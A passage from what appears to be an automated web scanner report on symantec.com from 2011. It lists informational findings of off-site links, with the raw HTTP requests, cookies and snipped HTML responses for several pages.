s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fpurchasing.jsp%2525253Fpcid%2525253Dpcat_info_risk_comp%25252526pvid%2525253Dfds_1%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 52358 Cache-Control: public, max-age=3599 Date: Fri, 09 Sep 2011 21:34:23 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>VeriSign Identity Protection Fraud Detection Service: Purchasing Options - S...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.58. http://www.symantec.com/business/theme.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/theme.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/business/theme.jsp?themeid=contact-verisign The response contains the following links to other domains:http://free.pctools.com/free-antivirus/ http://twitter.com/VeriSignAuth http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.facebook.com/VeriSignAuthentication http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.thawte.com/ http://www.verisign.ch/ http://www.verisign.co.jp/ http://www.verisign.co.uk/ http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/code-signing/index.html?tid=sym_a_box http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box http://www.verisign.com/ssl/free-trial/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/seal/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html http://www.verisign.com/support/contact/index.html http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html http://www.verisign.in/ http://www.verisignchina.com.cn/ http://www.youtube.com/verisignauth https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 https://idprotect.verisign.com/wheretouse.v https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002 https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000 https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020
Request
GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 51820 Cache-Control: public, max-age=1145 Date: Fri, 09 Sep 2011 21:26:48 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063" target="_blank"> Submit an inquiry online</a>...[SNIP]... </strong> If you purchased your VIP Credential from a VIP Member Site, contact the VIP Member Site for assistance. For a list of all member sites, <a href="https://idprotect.verisign.com/wheretouse.v" target="_blank"> click here</a>...[SNIP]... <strong><a href="http://www.verisign.ch/" target="_blank"> Europe Headquarters</a>...[SNIP]... <strong><a href="http://www.verisign.in/" target="_blank"> India</a>...[SNIP]... <strong><a href="http://www.verisign.com.au/" target="_blank"> Australia Headquarters</a>...[SNIP]... <strong><a href="http://www.verisign.co.jp/" target="_blank"> Japan Headquarters </a>...[SNIP]... <strong><a href="http://www.verisign.ch/" target="_blank"> Switzerland</a>...[SNIP]... <strong><a href="http://www.thawte.com/"> Africa</a>...[SNIP]... <strong><a href="http://www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <strong><a href="http://www.verisign.com.br/" target="_blank"> Brazil</a>...[SNIP]... <strong><a href="http://www.verisignchina.com.cn/" target="_blank"> China</a>...[SNIP]... </h4> <a href="http://www.verisign.com/support/contact/index.html" target="_blank"> VeriSign Support Contacts</a>...[SNIP]... <br /> <a href="http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_blank"> Report Code Signing Misuse</a><br /> <a href="http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html" target="_blank"> Report VeriSign Seal Abuse</a><br /> <a href="http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html" target="_blank"> Report EV Certificate Complaint</a>...[SNIP]... f you have questions regarding the VeriSign Secured.. Seal or VeriSign Trust Seal, including how to obtain one for use on your site or how it is being used on a site you have visited, please visit our <a href="http://www.verisign.com/ssl/seal/index.html" target="_blank"> seal information page</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy SSL Certificates" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" title="Buy SSL Certificates" target="_blank"> SSL Certificates</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy VeriSign Trust Seal" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" title="Buy VeriSign Trust Seal" target="_blank"> VeriSign Trust Seal</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy Code Signing Certificates" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" title="Buy Code Signing" target="_blank"> Code Signing</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/free-trial/index.html" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-try-btn.gif" width="50" height="15" alt="Free VeriSign Trials" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/free-trial/index.html" title="Free Trials" target="_blank"> Free Trials</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-renew-btn.gif" width="50" height="15" alt="Renew SSL Certificates" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" title="Renew SSL Certificates" target="_blank"> SSL Certificates</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-signin-btn.gif" width="50" height="15" alt="Sign In to My Account" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" title="Sign In to My Account" target="_blank"> My Account</a>...[SNIP]... <div style="float:left; width:90px; margin-right:5px"> <a href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-logo.gif" width="90" height="49" alt="Get a VeriSign Seal" />...[SNIP]... <div style="padding-top:5px"> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" title="Get a VeriSign Seal" target="_blank"> Get a VeriSign Seal</a>...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://twitter.com/VeriSignAuth" target="_blank"> <div style="float: left;">...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://www.facebook.com/VeriSignAuthentication" target="_blank"> <div style="float: left;">...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://www.youtube.com/verisignauth" target="_blank"> <div style="float: left;">...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.59. http://www.symantec.com/business/verisign/fraud-detection-service
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/verisign/fraud-detection-service
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps The response contains the following links to other domains:http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store http://buy.norton.com/?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:30:49 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-...[SNIP]... <div id="globalNavMainInner5"> <a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'> Store</a>...[SNIP]... <li><a href="http://buy.norton.com?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store"> Store</a>...[SNIP]... <h3><a href="http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store"> Store</a>...[SNIP]... <b><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Norton</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Welcome</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Shop Products</a>...[SNIP]... <li><a href="http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store"> Renew</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Shopping Resources</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Store Services</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/partners/sales-and-marketing/sales-marketing.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp?id=marketing The response contains the following links to other domains:http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /partners/sales-and-marketing/sales-marketing.jsp?id=marketing HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp%2525253Fid%2525253Dmarketing%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
